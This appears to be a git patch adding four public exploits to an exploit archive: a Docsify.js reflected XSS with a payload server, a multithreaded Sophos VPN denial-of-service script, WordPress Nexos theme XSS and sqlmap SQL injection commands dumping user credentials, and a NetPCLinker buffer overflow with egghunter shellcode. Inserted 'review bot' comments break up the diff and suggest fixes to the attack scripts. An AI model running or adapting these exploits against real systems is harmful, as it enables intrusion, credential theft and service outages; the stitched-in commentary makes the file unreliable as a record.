From 67c1f99f412926da3fc1d340581fad7842e81bad Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 23 Jul 2020 05:02:04 +0000
Subject: [PATCH] DB: 2020-07-23 4 changes to exploits/shellcodes NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) Docsify.js 4.11.4 - Reflective Cross-Site Scripting WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection Sophos VPN Web Panel 2020 - Denial of Service (Poc)
---
 exploits/multiple/webapps/48681.txt | 66 +++++++++++++++++++
 exploits/multiple/webapps/48683.py | 99 +++++++++++++++++++++++++++++
 exploits/php/webapps/48682.txt | 53 +++++++++++++++
 exploits/windows/local/48680.py | 62 ++++++++++++++++++
 files_exploits.csv | 4 ++
 5 files changed, 284 insertions(+)
 create mode 100644 exploits/multiple/webapps/48681.txt
 create mode 100755 exploits/multiple/webapps/48683.py
 create mode 100644 exploits/php/webapps/48682.txt
 create mode 100755 exploits/windows/local/48680.py
diff --git a/exploits/multiple/webapps/48681.txt b/exploits/multiple/webapps/48681.txt
new file mode 100644
index 000000000..fecc004a1
--- /dev/null
+++ b/exploits/multiple/webapps/48681.txt
@@ -0,0 +1,66 @@ +# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting +# Date: 2020-06-22 +# Exploit Author: Amin Sharifi +# Vendor Homepage: https://docsify.js.org +# Software Link: https://github.com/docsifyjs/docsify +# Version: 4.11.4 +# Tested on: Windows 10 +# CVE : CVE-2020-7680 + + +docsify.js uses fragment identifiers (parameters after # sign) to load +resources from server-side .md files. it then renders the .md file inside +the HTML page. + +For example : https://docsify.js.org/#/quickstart sends an ajax to +https://docsify.js.org/quickstart.md and renders it inside the html page. + +due to lack of validation it is possible to provide external URLs after the +/#/ and render arbitrary javascript/HTML inside the page which leads to +DOM-based Cross Site Scripting (XSS). + + +Steps to reproduce: + +step 1. setup a server (for example I use flask here, for the POC im +hosting one on https://asharifi.pythonanywhere.com ) + +step 2. the server should respond to request to /README.md with a crafted +XSS payload. here is the payload "Html Injection and XSS PoC

" +also the CORS should be set so that other Origins would be able to send +ajax requests to the server so Access-Control-Allow-Origin must be set to * +(or to the specific domain that you wanna exploit) example code below: + +------------------------------------------------- +from flask import Flask +import flask + +app = Flask(__name__) + + +@app.route('/README.md') +def inject(): + resp = flask.Response("Html Injection and XSS PoC

") + resp.headers['Access-Control-Allow-Origin'] = '*' + return resp + +------------------------------------------------------ +step 3. craft the link for execution of the exploit +for example for https://docsify.js.org website you can create the link as +below + +https://docsify.js.org/#//asharifi.pythonanywhere.com/README +(note that the mentioned domain is no longer vulnerable at the time writing +this report) + +when a user visits this URL an ajax request will be sent to +asharifi.pythonanywhere.com/README.md and the response of the request will +be rendered inside the webpage which results in XSS payload being executed +on the page. + + +snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099 +Mitre CVE entry: +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680 \ No newline at end of file diff --git a/exploits/multiple/webapps/48683.py b/exploits/multiple/webapps/48683.py new file mode 100755 index 000000000..3fe956e43 --- /dev/null +++ b/exploits/multiple/webapps/48683.py @@ -0,0 +1,99 @@ +# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc) +# Date: 2020-06-17 +# Exploit Author: Berk KIRAS +# Vendor Homepage: https://www.sophos.com/ +# Version:2020 Web Panel +# Tested on: Apache +# Berk KIRAS PwC - Cyber Security Specialist +# Sophos VPN Web Portal Denial of Service Vulnerability +# System parse JSON data. If we want to send some JSON with invalid data format +# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"} +# The system can not parse this data fastly and service down +# payload_option2 ="../../../../../../../../../FILE./FILE" + +#!/usr/bin/python3 + +import requests +import sys +import random +import threading + +def send_req(): + cnt = random.randint(9,22) + payload= "../"*cnt+'{FILE}' + my_datas_params = {"username":"test", + payload+"password":"admin", + "cookie":"0", + "submit":"
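Review bot: The advisory header has no remediation or fixed-version line, so a reader triaging CVE-2020-7680 has to follow the snyk link at the very end to learn whether an upgrade exists; a `# Fixed in: <PATCHED-VERSION>` line next to `# Version: 4.11.4` (taking the value from the linked advisory, not a guess) would make the entry self-contained. In this rendering the injected markup in step 2 and inside the flask `Response(...)` argument appears to have been stripped, leaving only the text "Html Injection and XSS PoC" — likely an extraction artefact rather than the committed file, but worth checking against the raw file. The root cause as described (an external host accepted after `/#/` and fetched as the markdown source) reads as a missing same-origin/path restriction on the fragment, which is what a defender should look for in the upstream fix.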

Oturum Aç
", + "language":"turkish", + "browser_id":"kbgacsyo-q4j5o7lr70e"} + + # You should change some values into the headers + Host_addr = sys.argv[2] + Origin=sys.argv[1]+"://"+sys.argv[2] + Referrer=sys.argv[1]+"://"+sys.argv[2] + Cookie=sys.argv[4] + #Headers + my_datas_headers ={ + "Host":str(Host_addr), + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", + "Accept": "text/javascript, text/html, application/xml, text/xml, */*", + "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "X-Requested-With": "XMLHttpRequest", + "X-Prototype-Version": "1.6.1_rc3", + "Content-type": "application/json; charset=UTF-8", + "Origin":Origin, + "Connection": "close", + "Referer":Referrer, + "Cookie":Cookie, + } + my_datas_headers2 ={ + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", + "Accept": "text/javascript, text/html, application/xml, text/xml, */*", + "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "X-Requested-With": "XMLHttpRequest", + "X-Prototype-Version": "1.6.1_rc3", + "Content-type": "application/json; charset=UTF-8", + "Connection": "close", + } + #If you want to edit and add headers some headers added + s = requests.session() + #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'} + s.headers.update(my_datas_headers2) + print(s.headers.items) + r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params) + + return s + +def main(): + if(len(sys.argv) < 6): + print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber") + sys.exit(0) + else: + try: + req_count=0 + while(True): + if(int(sys.argv[5])==1): + resp = send_req() + req_count=req_count+1 + print("Sending 
Requests... Count: "+str(req_count)) + else: + threads = int(sys.argv[5]) + jobs = [] + for i in range(0, threads): + out_list = list() + thread = threading.Thread(target=send_req) + jobs.append(thread) + for j in jobs: + j.start() + print("Jobs Started!") + # Ensure all of the threads have finished + for j in jobs: + j.join() + + except Exception: + print(Exception) + +main() \ No newline at end of file diff --git a/exploits/php/webapps/48682.txt b/exploits/php/webapps/48682.txt new file mode 100644 index 000000000..47b39bac7 --- /dev/null +++ b/exploits/php/webapps/48682.txt 
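Review bot: The usage text in `main()` contradicts the argument check above it: the example `exploit.py http vpn.test.com /test/index.plx 2` supplies four positional arguments, but the guard requires `len(sys.argv) >= 6`, i.e. five (scheme, host, path, cookie, thread count — `sys.argv[4]` is read as the Cookie header in `send_req`), so the documented invocation exits at the usage message. The handler `except Exception: print(Exception)` prints the class object rather than the error; write `except Exception as exc: print(exc)`. `print(s.headers.items)` prints the bound method, so `s.headers.items()` is presumably what was meant. The `#!/usr/bin/python3` line sits after the header comments, where it is an ordinary comment, so the 100755 mode does not by itself make the file runnable — it belongs on line 1.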
@@ -0,0 +1,53 @@ +# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection +# Google Dork: inurl:/wp-content/themes/nexos/ +# Date: 2020-06-17 +# Exploit Author: Vlad Vector +# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] +# Software Version: 1.7 +# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 +# Tested on: Debian 10 +# CVE: CVE-2020-15363, CVE-2020-15364 +# CWE: CWE-79, CWE-89 + + + +### [ Info: ] + +[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. + + + +### [ Vulnerabilities: ] + +[x] Unauthenticated Reflected XSS +[x] SQL Injection + + + +### [ PoC Unauthenticated Reflected XSS: ] + +[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="> + +[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 +Host: listing-themes.com + + + +### [ PoC SQL Injection: ] + +[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 + +[02:23:33] [INFO] the back-end DBMS is MySQL +[02:23:33] [INFO] fetching database names +[02:23:33] [INFO] fetching number of databases +[02:23:33] [INFO] resumed: 2 +available databases [2]: +[*] geniuscr_nexos +[*] information_schema + +[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 + +Database: TARGET-DB +Table: wp_users +[9 entries] ++--------------+------------------------------------+-------------------------+ \ No newline at end of file diff --git a/exploits/windows/local/48680.py b/exploits/windows/local/48680.py new file mode 100755 index 000000000..a62fc9b8b --- /dev/null +++ b/exploits/windows/local/48680.py 
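Review bot: The PoC section carries what look like artefacts from a real third-party host rather than the `TARGET` placeholder used elsewhere in the file — `Host: listing-themes.com` in the request and the database name `geniuscr_nexos` in the sqlmap output — and these should be redacted to the placeholder before publication. The header lists two CVEs (CVE-2020-15363, CVE-2020-15364) and two CWEs (CWE-79, CWE-89) without saying which CVE covers which finding; one line per finding, e.g. `# CVE-2020-15363: <WHICH-ISSUE>`, would let a defender map the entry to the right fix. No patched version or vendor fix is named, so the only actionable mitigation the entry conveys is that `search_order` and `search_location` reach the page and the query unvalidated.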
@@ -0,0 +1,62 @@ +# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) +# Date: 2019-06-28 +# Exploit Author: Saeed reza Zamanian +# Vendor Homepage: https://sourceforge.net/projects/netpclinker/ +# Software Link: https://sourceforge.net/projects/netpclinker/files/ +# Version: 1.0.0.0 +# Tested on: Windows Vista SP1 + +#!/usr/bin/python + +''' +# Replicate Crash: + 1) Install and Run the application + 2) Go to second tab "Clients Control Panel" + 3) Press Add button + 4) Run the exploit , the exploit creates a text file named payload.txt + 5) Copy payload.txt contents into the add client dialog , "DNS/IP" field + 6) Press OK . Your shellcode will be executed by pressing OK button. + +''' + +#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36" +#Bad Characters : \x0a\x0d\x33\x35\x36 + +shellcode = ( +"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1" +"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96" +"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b" +"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86" +"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef" +"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23" +"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62" +"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc" +"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10" +"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74" +"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55" +"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1" +"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe" +"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4" +"\x44\xbf\x0f\x56\x04\x40" +) + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +nSEH = '\xEB\xAA\x90\x90' #Jump Back + +# (Vista) +# PPR(ecx) : 0x00494b67 : 
startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] +# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe) + +SEH = '\x67\x4b\x49' +offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50) + +payload = offset+egghunter+"\x90"*50+nSEH+SEH + +try: + f=open("payload.txt","w") + print("[+] Creating %s bytes payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a10370b24..77a83fdbd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11122,6 +11122,7 @@ id,file,description,date,author,type,platform,port 48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware, 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows, 48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows, +48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -42926,3 +42927,6 @@ id,file,description,date,author,type,platform,port
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
 48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
 48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php,
+48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
+48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
+48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,